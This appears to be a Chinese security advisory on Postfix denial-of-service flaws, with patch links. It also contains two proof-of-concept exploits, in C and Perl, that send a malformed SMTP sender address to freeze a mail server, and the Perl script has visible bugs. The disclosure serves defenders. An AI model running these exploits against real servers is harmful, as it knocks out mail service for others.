Multiple Postfix多个拒绝服务攻击漏洞
发布时间:2003-08-04
更新时间:2003-08-07
严重程度:高
威胁程度:远程拒绝服务
错误类型:设计错误
利用方式:服务器模式
BUGTRAQ ID:8333

受影响系统
Wietse Venema Postfix 20011115

详细描述
Debian报告了Postfix邮件传送代理程序存在的两个漏洞。第一个漏洞的CVE编号为CAN-2003-0468,利用此漏洞可以强制Postfix扫描一个内部网络,此漏洞还可能被利用使服务器成为一个分布式拒绝服务攻击的工具,因为利用此漏洞可以使服务器连接任一服务器的任一端口。 第二个漏洞的CVE编号为CAN-2003-0540,是一个拒绝服务攻击漏洞,一个带恶意地址的邮件会导致服务器程序的死锁直到此邮件被手工从队列中删除为止。此漏洞也可能导致锁死SMTP监听程序,而导致拒绝服务。

测试代码

/*
 * postfixdos.c for 1.1.12 by r3b00t <r3b00t@tx.pl>
 * ------------------------------------------------
 * remote/local Postfix up to (including) 1.1.12 DoS
 * discovered by lcamtuf <lcamtuf@coredump.cx>
 */

/*
 * Review note: this is the proof-of-concept attached to the advisory above
 * (BUGTRAQ ID 8333).  It opens a single SMTP session to port 25 of the host
 * given on the command line and sends HELO, a MAIL FROM whose sender address
 * is malformed, and one RCPT TO, then hangs up.  The advisory text describes
 * the second issue (CAN-2003-0540) as a message with a malicious address that
 * leaves the server deadlocked until the message is removed from the queue by
 * hand; the fixed packages are listed under 解决方案 below.  From the defender's
 * side, a stuck queue entry with an envelope sender of this form, or an SMTP
 * listener that stops answering after such a session, is the symptom to look
 * for (inferred from the advisory text, not confirmed here).
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <unistd.h>
#include <arpa/inet.h>

/* Connected SMTP socket; shared by main() and the two helpers below. */
int sock = 0;

void get_response(void);
void say(char *it);

/*
 * Entry point.  argv[1] is the SMTP server to contact.
 * Every error path calls exit(0), so the shell sees success even on failure;
 * the usage/resolve/socket/connect messages go to stdout, not stderr.
 */
int main(int argc, char* argv[]) {
    struct hostent *hp;
    struct sockaddr_in addr;

    printf("postfixdos.c for 1.1.12 by r3b00t <r3b00t@tx.pl>\n");
    if (argc<2) {
        printf("usage: %s <smtpserver>\n", argv[0]);
        exit(0);
    }

    /* gethostbyname() is the legacy resolver API (obsolete since POSIX.1-2008). */
    hp=gethostbyname(argv[1]);
    if (!hp) {
        printf("can't resolve %s\n", argv[1]);
        exit(0);
    }

    /* bzero()/bcopy() are legacy BSD helpers; memset()/memcpy() are the standard forms. */
    bzero((char *)&addr, sizeof(addr));
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("can't create socket\n");
        exit(0);
    }
    bcopy(hp->h_addr, (char *)&addr.sin_addr, hp->h_length);
    addr.sin_family=AF_INET;
    addr.sin_port=htons(25);   /* SMTP */

    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))!=0) {
        printf("can't connect to %s\n", argv[1]);
        close(sock);
        exit(0);
    }

    /* Read the server greeting, then drive one short SMTP envelope. */
    get_response();
    say("helo host\r\n");
    say("mail from: <.!>\r\n");
    say("rcpt to: <someuser123@[127.0.0.1]>\r\n");
    /* now should be freezed */

    /* 2 is SHUT_RDWR on the usual platforms. */
    shutdown(sock, 2);
    close(sock);
    printf("done.\n");
    return 0;
}

/*
 * Read one reply from the server into a 64-byte buffer and echo it when the
 * first digit is not an SMTP 2xx/3xx class.
 *
 * Defect in the PoC's own output handling: the return value of recv() is not
 * checked and buff is never NUL-terminated, so printf("%s") can read past the
 * end of buff (or print whatever was on the stack if recv() returned 0/-1).
 */
void get_response(void) {
    char buff[64];
    recv(sock, buff, sizeof(buff), 0);
    if (buff[0]!='2' && buff[0]!='3')
        printf("%s", buff);
}

/* Send one command line and consume its reply. send()'s return value is not checked. */
void say(char *it) {
    send(sock, it, strlen(it), 0);
    get_response();
}

#!/usr/bin/perl
#Remote Dos for postfix version 1.1.12
#tested on redhat 9.0, redhat 8.0, mandrake 9.0
#deadbeat,
#mail: daniels@legend.co.uk
# deadbeat@sdf.lonestar.org
#
#thanks..enjoy ;)
#
# Review note: second proof-of-concept from the same advisory.  It runs a
# longer SMTP dialogue (HELO, MAIL From, RCPT To, a Subject line, DATA and the
# terminating ".") over IO::Socket::INET, pausing one second between commands,
# and takes its subject, body and target host from the command line.

use IO::Socket;

if (!$ARGV[3]){
    die "Usage:perl $0 <subject> <data> <smtp host to use>\n";
}

$subject = $ARGV[0];
$junk = $ARGV[1];
$smtp_host = $ARGV[2];

$helo = "HELO $smtp_host\r\n";
$rcpt = "RCPT To:<nonexistant@127.0.0.1>\r\n";
$data = "DATA\n$junk\r\n";
$sub = "Subject: $subject\r\n";
$from = "MAIL From <.!@$smtp_host>\r\n";

print "Going to connect to $smtp_host\n";
$sox = IO::Socket::INET->new(
    Proto=> 'tcp',
    PeerPort=>'25',
    PeerAddr=>'$smtp_host',
);
print "Connected...\n";

print $sox $helo;
sleep 1;
print $sox $from;
sleep 1;
print $sox $rcpt;
sleep 1;
print $sox $sub;
sleep 1;
print $sox $data;
sleep 1;
print $sox ".\r\n\r\n";
sleep 1;
close $sox;
print "Done..should lock up Postfix 1.1.12 and below ;)\n\n";

解决方案
厂商已经在最新版本的软件中修补了此漏洞:

Wietse Venema Postfix 20010228:
Trustix Upgrade postfix-0.0.20010228.pl08-4tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/postfix-0.0.20010228.pl08-4tr.i586.rpm

Wietse Venema Postfix 19991231:
Trustix Upgrade postfix-19991231_pl13-4tr.i586.rpm
ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/postfix-19991231_pl13-4tr.i586.rpm

相关信息
Postfix 1.1.12 remote DoS / Postfix 1.1.11 bounce scanning
http://archives.neohapsis.com/archives/bugtraq/2003-08/0027.html
Postfix: old bugs keep coming back
http://archives.neohapsis.com/archives/bugtraq/2003-08/0061.html
|